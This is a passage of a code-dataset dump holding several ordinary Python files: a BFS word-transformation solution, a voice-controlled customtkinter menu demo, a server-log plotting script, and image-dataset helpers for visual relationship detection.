"name"}, {"api_name": "PyQt4.QtGui.QGridLayout", "line_number": 16, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 16, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 17, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 17, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 18, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 18, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 19, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 19, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QComboBox", "line_number": 20, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 20, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 21, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 21, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLabel", "line_number": 22, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 22, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 23, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 23, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QListWidget", "line_number": 24, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 24, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 25, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 25, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QPushButton", "line_number": 26, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 26, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 27, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 27, "usage_type": "name"}, {"api_name": "engine.state.OP_MAP.keys", "line_number": 45, "usage_type": "call"}, {"api_name": "engine.state.OP_MAP", "line_number": 45, "usage_type": "name"}, {"api_name": "engine.state.RuleComponent", "line_number": 61, "usage_type": "call"}, {"api_name": "common.Component", "line_number": 62, "usage_type": "call"}, {"api_name": "common.WidgetItemComponent", "line_number": 63, "usage_type": "call"}, {"api_name": "event.Event", "line_number": 71, "usage_type": "call"}, {"api_name": "event.EVENT_MANAGER.fire_event", "line_number": 73, "usage_type": "call"}, {"api_name": "event.EVENT_MANAGER", "line_number": 73, "usage_type": "name"}, {"api_name": "event.Event", "line_number": 87, "usage_type": "call"}, {"api_name": "event.EVENT_MANAGER.fire_event", "line_number": 89, "usage_type": "call"}, {"api_name": "event.EVENT_MANAGER", "line_number": 89, "usage_type": "name"}, {"api_name": "common.WidgetItemComponent", "line_number": 105, "usage_type": "call"}]} +{"seq_id": "33639489869", "text": "from collections import deque\n\n\ndef solution(begin, target, words):\n answer = 0\n\n if target not in words:\n return answer\n words.insert(0, begin)\n graph = [[] for _ in range(len(words))]\n for i in range(len(words)):\n for j in range(i+1, len(words)):\n if abcCompare(words[i], words[j]):\n graph[i].append(j)\n graph[j].append(i)\n d1 = deque()\n visited = [0] * len(words)\n d1.append(0)\n visited[0] = 0\n\n while True:\n if not d1:\n answer = 0\n break\n a = d1.popleft()\n\n if words[a] == target:\n answer = visited[a]\n break\n\n for i in graph[a]:\n if not visited[i]:\n d1.append(i)\n visited[i] = visited[a] + 1\n\n return answer\n\n\ndef abcCompare(a, b):\n cnt = 0\n for i in range(len(a)):\n if a[i] == b[i]:\n cnt = cnt + 1\n if cnt == len(a) - 1:\n return True\n else:\n return False", "repo_name": "tfer2442/myAlgorithm", "sub_path": "프로그래머스/lv3/43163. 단어 변환/단어 변환.py", "file_name": "단어 변환.py", "file_ext": "py", "file_size_in_byte": 1005, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.deque", "line_number": 16, "usage_type": "call"}]} +{"seq_id": "21650894362", "text": "import customtkinter as ctk\nimport speech_recognition as sr\nimport pygame\nimport threading\nimport time\n\n\nroot = ctk.CTk()\nroot.geometry('500x400')\nroot.title('practice')\nctk.set_appearance_mode(\"light\")\nctk.set_default_color_theme(\"blue\")\n\nr = sr.Recognizer()\npygame.mixer.init()\n\n\ndef record_audio(ask=False, location=False):\n\n with sr.Microphone() as source:\n\n audio = r.listen(source, timeout=5, phrase_time_limit=7)\n voice_data = ''\n try:\n voice_data = r.recognize_google(\n audio, language='en-US')\n print(voice_data)\n except sr.UnknownValueError:\n\n pygame.mixer.music.load(\"sounds/soryididnotget2.wav\")\n pygame.mixer.music.play(loops=0)\n time.sleep(4)\n\n pygame.mixer.music.load(\"sounds/speak2.wav\")\n pygame.mixer.music.play(loops=0)\n time.sleep(3)\n\n voice_data = record_audio()\n indicate(voice_data)\n\n except sr.RequestError:\n\n pygame.mixer.music.load(\"sounds/spechservicedown2.wav\")\n pygame.mixer.music.play(loops=0)\n exit()\n return voice_data\n\n\ndef home_page():\n home_frame = ctk.CTkFrame(main_frame)\n\n lb = ctk.CTkLabel(home_frame, text=\"laa home\", font=('Bold', 24))\n lb.pack()\n\n home_frame.pack(pady=20)\n\n\ndef menu_page():\n menu_frame = ctk.CTkFrame(main_frame)\n\n lb = ctk.CTkLabel(menu_frame, text=\"laa menu\", font=('Bold', 24))\n lb.pack()\n\n menu_frame.pack(pady=20)\n\n\ndef contactas_page():\n contact_frame = ctk.CTkFrame(main_frame)\n\n lb = ctk.CTkLabel(contact_frame, text=\"laa contact us\", font=('Bold', 24))\n lb.pack()\n\n contact_frame.pack(pady=20)\n\n\ndef about_page():\n about_frame = ctk.CTkFrame(main_frame)\n\n lb = ctk.CTkLabel(about_frame, text=\"laa about\", font=('Bold', 24))\n lb.pack()\n\n about_frame.pack(pady=20)\n\n\noption_frame = ctk.CTkFrame(root)\n\nhome_btn = ctk.CTkButton(option_frame, text=\"Home\", font=('Bold', 24),\n fg_color=(\"#c3c3c3\"), text_color='#158aff')\nhome_btn.place(x=10, y=50)\n\nhome_indicate = ctk.CTkLabel(\n option_frame, text='', bg_color='#c3c3c3', width=5, height=40)\nhome_indicate.place(x=3, y=50)\n\nmenu_btn = ctk.CTkButton(option_frame, text=\"menu\", font=('Bold', 24),\n fg_color=(\"#c3c3c3\"), text_color='#158aff')\nmenu_btn.place(x=10, y=100)\n\nmenu_indicator = ctk.CTkLabel(\n option_frame, text='', bg_color='#c3c3c3', width=5, height=40)\nmenu_indicator.place(x=3, y=100)\n\n\ncontactas = ctk.CTkButton(option_frame, text=\"contact\", font=('Bold', 24),\n fg_color=(\"#c3c3c3\"), text_color='#158aff')\ncontactas.place(x=10, y=150)\n\ncontactas_indicator = ctk.CTkLabel(\n option_frame, text='', bg_color='#c3c3c3', width=5, height=40)\ncontactas_indicator.place(x=3, y=150)\n\nabout_btn = ctk.CTkButton(option_frame, text=\"about\", font=('Bold', 24),\n fg_color=(\"#c3c3c3\"), text_color='#158aff')\nabout_btn.place(x=10, y=200)\n\nabout_indicator = ctk.CTkLabel(\n option_frame, text='', bg_color='#c3c3c3', width=5, height=40)\nabout_indicator.place(x=3, y=200)\n\n\noption_frame.pack(side=ctk.LEFT)\noption_frame.pack_propagate(False)\noption_frame.configure(width=150, height=400)\n\nmain_frame = ctk.CTkFrame(root, fg_color=(\"#c3c3c3\", \"#2d2d2d\"))\n\nmain_frame.pack(side=ctk.LEFT)\nmain_frame.pack_propagate(False)\nmain_frame.configure(height=400, width=500)\n\n\ndef hide_indi():\n home_indicate.configure(bg_color=\"#c3c3c3\")\n menu_indicator.configure(bg_color=\"#c3c3c3\")\n contactas_indicator.configure(bg_color=\"#c3c3c3\")\n about_indicator.configure(bg_color=\"#c3c3c3\")\n\n\ndef delete_pages():\n for frame in main_frame.winfo_children():\n frame.destroy()\n\n\ndef ind(lb, page):\n hide_indi()\n lb.configure(bg_color=\"#158aff\")\n delete_pages()\n page()\n voice_data = record_audio()\n indicate(voice_data)\n\n\ndef indicate(voice_data):\n if \"home\" in voice_data:\n ind(home_indicate, home_page)\n elif \"menu\" in voice_data:\n ind(menu_indicator, menu_page)\n elif \"contact us\" in voice_data:\n ind(contactas_indicator, contactas_page)\n elif \"about\" in voice_data:\n ind(about_indicator, about_page)\n else:\n pygame.mixer.music.load(\"sounds/soryididnotget2.wav\")\n pygame.mixer.music.play(loops=0)\n time.sleep(4)\n\n pygame.mixer.music.load(\"sounds/speak2.wav\")\n pygame.mixer.music.play(loops=0)\n time.sleep(3)\n\n voice_data = record_audio()\n indicate(voice_data)\n\n\ndef threads():\n voice_data = record_audio()\n indicate(voice_data)\n\n\nthreading.Thread(target=threads).start()\nroot.mainloop()\n", "repo_name": "Etsubsole/voice-based-email", "sub_path": "practice.py", "file_name": "practice.py", "file_ext": "py", "file_size_in_byte": 4680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "customtkinter.CTk", "line_number": 8, "usage_type": "call"}, {"api_name": "customtkinter.set_appearance_mode", "line_number": 11, "usage_type": "call"}, {"api_name": "customtkinter.set_default_color_theme", "line_number": 12, "usage_type": "call"}, {"api_name": "speech_recognition.Recognizer", "line_number": 14, "usage_type": "call"}, {"api_name": "pygame.mixer.init", "line_number": 15, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 15, "usage_type": "attribute"}, {"api_name": "speech_recognition.Microphone", "line_number": 20, "usage_type": "call"}, {"api_name": "speech_recognition.UnknownValueError", "line_number": 28, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 30, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 30, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 31, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 31, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 32, "usage_type": "call"}, {"api_name": "pygame.mixer.music.load", "line_number": 34, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 34, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 35, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 35, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 36, "usage_type": "call"}, {"api_name": "speech_recognition.RequestError", "line_number": 41, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 43, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 43, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 44, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 44, "usage_type": "attribute"}, {"api_name": "customtkinter.CTkFrame", "line_number": 50, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 52, "usage_type": "call"}, {"api_name": "customtkinter.CTkFrame", "line_number": 59, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 61, "usage_type": "call"}, {"api_name": "customtkinter.CTkFrame", "line_number": 68, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 70, "usage_type": "call"}, {"api_name": "customtkinter.CTkFrame", "line_number": 77, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 79, "usage_type": "call"}, {"api_name": "customtkinter.CTkFrame", "line_number": 85, "usage_type": "call"}, {"api_name": "customtkinter.CTkButton", "line_number": 87, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 91, "usage_type": "call"}, {"api_name": "customtkinter.CTkButton", "line_number": 95, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 99, "usage_type": "call"}, {"api_name": "customtkinter.CTkButton", "line_number": 104, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 108, "usage_type": "call"}, {"api_name": "customtkinter.CTkButton", "line_number": 112, "usage_type": "call"}, {"api_name": "customtkinter.CTkLabel", "line_number": 116, "usage_type": "call"}, {"api_name": "customtkinter.LEFT", "line_number": 121, "usage_type": "attribute"}, {"api_name": "customtkinter.CTkFrame", "line_number": 125, "usage_type": "call"}, {"api_name": "customtkinter.LEFT", "line_number": 127, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.load", "line_number": 163, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 163, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 164, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 164, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 165, "usage_type": "call"}, {"api_name": "pygame.mixer.music.load", "line_number": 167, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 167, "usage_type": "attribute"}, {"api_name": "pygame.mixer.music.play", "line_number": 168, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 168, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 169, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 180, "usage_type": "call"}]} +{"seq_id": "19604283058", "text": "#!/usr/bin/env python2.7\n\nimport matplotlib\nmatplotlib.use('Agg')\nfrom matplotlib import rcParams, cm\nfrom matplotlib import pyplot as plt\nimport numpy as np\nfrom time import strptime, time, mktime\nfrom math import floor \n\nflog = open('/local/snarayan/logs/flask.log','r')\n\nBIN = 3600\ns2h = 1./3600\napis = ['start', 'done', 'query', 'clean','requestdata']\ndata = {'N':[],\n 't':[]}\nfor a in apis:\n data[a] = []\n\ndef get_line():\n i = 0\n while True:\n# if i == 100:\n# raise StopIteration \n line = next(flog).strip()\n i += 1\n yield line\n\nget = get_line()\n\nt = None \ntry:\n while True:\n line = next(get)\n if not any([line.startswith('condor_'+a+' start') for a in apis]):\n continue \n _ = next(get) # data line\n line2 = next(get)\n if not line2.startswith(line.split()[0]+' took'):\n continue \n try:\n line_ = line.split(': ')[1].split(' ')[0]\n t_ = mktime(strptime(line_, '%Y%m%d:%H:%M:%S'))\n except Exception as e:\n t_ = t \n raise e\n if t is None or t_ > t + BIN:\n t = t_\n data['t'].append(t)\n data['N'].append(0)\n for a in apis:\n data[a].append(0)\n data['N'][-1] += 1\n a = line.split(' ')[0].replace('condor_','')\n data[a][-1] += float(line2.split(' ')[2])\nexcept StopIteration:\n pass\n\nfor k,v in data.iteritems():\n data[k] = np.array(v)\n\ndata['t'] -= time()\ndata['t'] *= s2h \nfor a in apis:\n data[a] /= data['N']\n\nfig, ax1 = plt.subplots()\nax1.plot(data['t'], data['N'], 'darkgrey')\nax1.set_xlabel('Time [H]')\nax1.set_ylabel('Number of queries / Hour', color='darkgrey')\n#ax1.set_xscale('symlog')\nax1.tick_params('y', colors='darkgrey')\n\nax2 = ax1.twinx()\nfor a in apis:\n# if a == 'clean':\n# continue\n ax2.semilogy(data['t'], data[a], label=a)\nax2.set_ylabel('Average query time [s]')\n\nplt.legend(loc='best', fancybox=True)\nfig.tight_layout()\n\nout = '/home/snarayan/public_html/figs/thesis/bird_watcher'\nplt.savefig(out+'.png', dpi=200)\nplt.savefig(out+'.pdf')\n", "repo_name": "sidnarayanan/flask_server", "sub_path": "log_analysis/progress.py", "file_name": "progress.py", "file_ext": "py", "file_size_in_byte": 2139, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "matplotlib.use", "line_number": 4, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 44, "usage_type": "call"}, {"api_name": "time.strptime", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 61, "usage_type": "call"}, {"api_name": "time.time", "line_number": 63, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 82, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 82, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 87, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 87, "usage_type": "name"}]} +{"seq_id": "69920044354", "text": "\"\"\"\nHelper API\n\"\"\"\n\nimport argparse\nimport csv\nimport pickle\nimport os\nimport sys\nimport random\nimport math\nimport re\nimport time\nimport wget\nimport numpy as np\nfrom PIL import Image\nimport cv2\nimport glob\nfrom shutil import copyfile\nimport collections\nfrom joblib import Parallel, delayed\nfrom tqdm import tqdm_notebook as tqdm\nimport parallel \nimport concurrent.futures\nimport matplotlib.pyplot as plt\nimport matplotlib.patches as patches\n\n\ndef get_fid(image_path):\n return os.path.basename(image_path).split('.')[0]\n\ndef process_labels_from_csv_input(prefix='data/raw', \n labels_csv_fname_list=['class-descriptions-boxable.csv', \n 'class-descriptions.csv']):\n label_dict = {}\n # Process the labels info files and create a key value pair\n for flabel_csv in labels_csv_fname_list:\n with open(os.path.join(prefix, flabel_csv)) as f:\n rows = csv.reader(f)\n for row in rows:\n if row[0] in label_dict:\n #print('Label already exists: {}:{}, new label: {}:{}'.\n # format(row[0], label_dict[row[0]], row[0], row[1]))\n assert row[1] == label_dict[row[0]]\n label_dict[row[0]]=row[1]\n \n return label_dict\n \ndef process_raw_csv_input(prefix='data/raw', train_csv_fname = 'challenge-2018-train-vrd.csv', \n labels_csv_fname_list = ['class-descriptions-boxable.csv', 'class-descriptions.csv']):\n \"\"\"\n Process the labels from given label names and create three categories\n a. Entity\n b. Attribute\n c. Relationship\n \"\"\"\n \n label_dict = process_labels_from_csv_input(prefix, labels_csv_fname_list)\n \n # Process the training data and create x, y i.e x->(imageid, (bounding box data)) y->(label1,label2,relationship)\n label1_dict = collections.defaultdict(int)\n label2_dict = collections.defaultdict(int)\n relationship_dict = collections.defaultdict(int)\n xy_list = []\n missing_label_dict = {}\n ignore_header = True\n miss_count = 0\n with open(os.path.join(prefix, train_csv_fname)) as f:\n rows = csv.reader(f)\n for row in rows:\n miss = False\n if ignore_header:\n ignore_header = False\n continue\n x = (row[0], (row[3:11]))\n y = (row[1], row[2], row[11])\n if y[0] not in label_dict:\n if y[0] not in missing_label_dict:\n print('Label1 missing: {}'.format(y[0]))\n miss = True\n missing_label_dict[y[0]] = y[0]\n else:\n label1_dict[y[0]] += 1\n if y[1] not in label_dict:\n if y[1] not in missing_label_dict:\n print('Label2 missing: {}, label1 : {}, relation: {}'.format(y[1], label_dict[y[0]], row[11]))\n miss_count += 1\n miss = True\n missing_label_dict[y[1]] = y[1]\n else:\n label2_dict[y[1]] += 1\n relationship_dict[y[2]] += 1\n if miss is False:\n xy_list.append((x, y))\n print (\"Missing label count: {}\".format(miss_count)) \n return xy_list, (label1_dict, label2_dict, relationship_dict), label_dict\n\ndef get_data_dir_from_raw_single_dir(X_dict, prefix='data', dir_list=None, out_dir='processed'):\n X_fset = set()\n copy_prefix_dir = os.path.join(prefix, out_dir)\n for d in dir_list:\n copy_dir = os.path.join(os.getcwd(), os.path.join(copy_prefix_dir, d))\n os.makedirs(copy_dir, exist_ok=True)\n flist = glob.glob(os.path.join(os.path.join(prefix, d), '*.jpg'))\n for f in flist:\n fid = os.path.basename(f).split('.')[0]\n if fid in X_dict:\n dst_f = os.path.join(copy_dir, os.path.basename(f))\n X_fset.add(dst_f)\n X_dict[fid] = (X_dict[fid], dst_f)\n copyfile(os.path.join(os.getcwd(), f), dst_f)\n \n return X_fset\n\ndef get_data_from_dir_recursive(xy_list, prefix='data/processed', dir_input='raw'):\n \"\"\"\n Load the file path for each image id. The dictionary can only have image file path since\n a single image can have multiple labels i.e multiple y values.\n\n Example of entry in xy_list:\n Train data xy_list[0]: (\n ('fe58ec1b06db2bb7', ['0.005', '0.033125', '0.58', '0.62777776', \n '0.005', '0.033125', '0.58', '0.62777776']) , \n ('/m/04bcr3', '/m/083vt', 'is'))\n \"\"\"\n cwd = os.getcwd()\n xy_list_valid = [] # xy_list that has valid image files available\n X_id_to_file_dict = {} # id of the image to file dictionary\n def process_files(dir_path):\n flist = glob.glob(os.path.join(dir_path, '*.jpg'))\n print('Processing dir: {}, image count: {}'.format(dir_path, len(flist)))\n \n for f in flist:\n fid = os.path.basename(f).split('.')[0]\n if fid in X_id_to_file_dict:\n print ('Error id exists twice: {}-{}-{}'.format(fid, f, X_id_to_file_dict[fid]))\n continue\n else:\n X_id_to_file_dict[fid] = os.path.join(cwd, f)\n \n def helper(dir_input_full):\n l = next(os.walk(dir_input_full))[1]\n if len(l) == 0: \n return\n \n for d in l:\n dir_path = os.path.join(dir_input_full, d)\n process_files(dir_path)\n helper(dir_path)\n \n process_files(os.path.join(prefix, dir_input))\n helper(os.path.join(prefix, dir_input))\n \n for xy in xy_list:\n if xy[0][0] in X_id_to_file_dict:\n xy_list_valid.append(xy)\n\n return xy_list_valid, X_id_to_file_dict\n\ndef bounding_box_to_plt(image, b):\n \"\"\"\n Convert one bounding box data into what mathplotlib understands\n [XMin1, XMax1, YMin1, YMax1, XMin2, XMax2, YMin2, YMax2]\n ['0.005', '0.033125', '0.58', '0.62777776', '0.005', '0.033125', '0.58', '0.62777776']\n for: https://matplotlib.org/api/_as_gen/matplotlib.patches.Rectangle.html#matplotlib.patches.Rectangle\n \"\"\"\n xsize = image.shape[1]\n ysize = image.shape[0]\n xy = (int(float(b[0]) * xsize), int(float(b[2]) * ysize)) # (XMin1 * xsize, YMin1 * ysize)\n width = int(float(b[1]) * xsize) - xy[0] # XMax1 * xsize - XMin1 * xsize\n height = int(float(b[3]) * ysize) - xy[1] # YMax1 * ysize - Ymin * ysize \n return (xy, width, height)\n\ndef two_bounding_boxes_to_plt(image, b):\n \"\"\"\n Convert two bounding box data into what mathplotlib understands\n \"\"\"\n return [bounding_box_to_plt(image, b[0:4]), bounding_box_to_plt(image, b[4:len(b)])]\n \ndef show_images(images,titles=None, bounding_boxes_list=[]):\n \"\"\"Display a list of images\"\"\"\n n_ims = len(images)\n if titles is None: titles = ['(%d)' % i for i in range(1,n_ims + 1)]\n fig = plt.figure()\n n = 1\n \n for i in range(0, len(images)):\n image = images[i]\n title = \"None\"\n if titles is not None and len(titles) > i:\n title = titles[i]\n \n bounding_boxes = None\n if bounding_boxes_list is not None and len(bounding_boxes_list) > i:\n bounding_boxes = bounding_boxes_list[i]\n\n a = fig.add_subplot(1,n_ims,n) # Make subplot\n if len(image.shape) == 2 or image.shape[2] == 1: # Is image grayscale?\n plt.imshow(np.resize(image, (image.shape[0], image.shape[1])), interpolation=\"bicubic\", cmap=\"gray\") # Only place in this blog you can't replace 'gray' with 'grey'\n else:\n plt.imshow(image, interpolation=\"bicubic\")\n if bounding_boxes is not None:\n box1, box2 = two_bounding_boxes_to_plt(image, bounding_boxes)\n rect1 = patches.Rectangle((box1[0]),box1[1],box1[2],linewidth=2,edgecolor='y',facecolor='none')\n rect2 = patches.Rectangle((box2[0]),box2[1],box2[2],linewidth=2,edgecolor='g',facecolor='none')\n a.add_patch(rect1)\n a.add_patch(rect2)\n if titles is not None:\n a.set_title(title + ' {}x{}'.format(image.shape[0], image.shape[1]))\n n += 1\n fig.set_size_inches(np.array(fig.get_size_inches()) * n_ims)\n plt.axis('off')\n plt.show()\n \ndef show_given_images(xy_given_list, id_to_file_dict, label_dict):\n img_list = []\n label_list = []\n bounding_boxes_list = []\n for xy in xy_given_list:\n fid = xy[0][0]\n bounding_boxes_list.append(xy[0][1])\n y = xy[1]\n label1 = y[0]\n label2 = y[1]\n if label1 in label_dict:\n label1 = label_dict[label1]\n if label2 in label_dict:\n label2 = label_dict[label2]\n \n label_list.append('{} {} {}'.format(label1, y[2], label2))\n if fid not in id_to_file_dict:\n print ('Error could not find id: {} in id_to_file_dict'.format(fid))\n raise \n img_list.append(cv2.cvtColor(cv2.imread(id_to_file_dict[fid], cv2.IMREAD_COLOR), cv2.COLOR_BGR2RGB))\n print ('Label_list\" {}'.format(label_list))\n show_images(img_list, titles=label_list, bounding_boxes_list=bounding_boxes_list)\n \ndef show_random_images(xy_given_list, id_to_file_dict, label_dict, count=4):\n xy_rnd_idx_list = np.random.choice(len(xy_given_list), count, replace=False)\n xy_rnd_list = [ xy_given_list[x] for x in xy_rnd_idx_list]\n show_given_images(xy_rnd_list, id_to_file_dict, label_dict)\n return xy_rnd_list\n\ndef _resize_job_helper(kv_list, output_dir, xsize=514, ysize=343):\n out_list = []\n for k, v in kv_list:\n if v is None:\n out_list.append((k, v))\n continue\n try:\n if os.path.isfile(v) is False:\n print('Invalid file failed for {}'.format(v))\n out_list.append((k, v))\n continue\n except:\n print('Invalid file failed for {}'.format(v))\n raise\n out_file = os.path.join(output_dir, os.path.basename(v))\n \n # If the file exists then \n if os.path.isfile(out_file):\n out_list.append((k, out_file))\n continue\n \n resize_img = cv2.resize(cv2.imread(v, cv2.IMREAD_COLOR),(xsize, ysize))\n out_file = os.path.join(output_dir, os.path.basename(v))\n cv2.imwrite(out_file, resize_img)\n \n out_list.append((k, out_file))\n return out_list\n\ndef chunks(l, n):\n \"\"\"Yield successive n-sized chunks from l.\"\"\"\n for i in range(0, len(l), n):\n yield l[i:i + n]\n \ndef resize_all(id_to_file_dict, prefix='data/processed', output_dir='resized_images', xsize=514, ysize=343, \n count=None):\n output_dir = os.path.join(os.getcwd(), os.path.join(prefix, output_dir))\n os.makedirs(output_dir, exist_ok=True)\n\n aprun = parallel.ParallelExecutor(n_jobs=7)\n \n chunked_list = list(chunks(list(id_to_file_dict.items()), int(len(id_to_file_dict.items())/8)))\n \n print ('chunk list size: {}'.format(len(chunked_list)))\n\n out_list = aprun(bar='tqdm')(delayed(_resize_job_helper)(kv_list, output_dir, xsize, ysize) \n for kv_list in chunked_list)\n ret_dict = dict()\n for l in out_list:\n for k, v in l:\n ret_dict[k] = v\n return ret_dict\n", "repo_name": "geek101/visual_relationship", "sub_path": "helpers.py", "file_name": "helpers.py", "file_ext": "py", "file_size_in_byte": 11509, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.basename", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 39, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 61, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 62, "usage_type": "call"}, {"api_name": "collections.defaultdict", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 68, "usage_type": "call"}, {"api_name": "os.path", "line_number": 68, "usage_type": "attribute"}, {"api_name": "csv.reader", "line_number": 69, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 100, "usage_type": "call"}, {"api_name": "os.path", "line_number": 100, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 102, "usage_type": "call"}, {"api_name": "os.path", "line_number": 102, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 102, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 103, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path", "line_number": 106, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 108, "usage_type": "call"}, {"api_name": "os.path", "line_number": 108, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 108, "usage_type": "call"}, {"api_name": "shutil.copyfile", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "os.getcwd", "line_number": 111, "usage_type": "call"}, {"api_name": "os.getcwd", "line_number": 126, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 130, "usage_type": "call"}, {"api_name": "os.path", "line_number": 130, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path", "line_number": 134, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path", "line_number": 139, "usage_type": "attribute"}, {"api_name": "os.walk", "line_number": 142, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 147, "usage_type": "call"}, {"api_name": "os.path", "line_number": 147, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path", "line_number": 151, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 184, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 184, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "numpy.resize", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.imshow", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 204, "usage_type": "call"}, {"api_name": "matplotlib.patches", "line_number": 204, "usage_type": "name"}, {"api_name": "matplotlib.patches.Rectangle", "line_number": 205, "usage_type": "call"}, {"api_name": 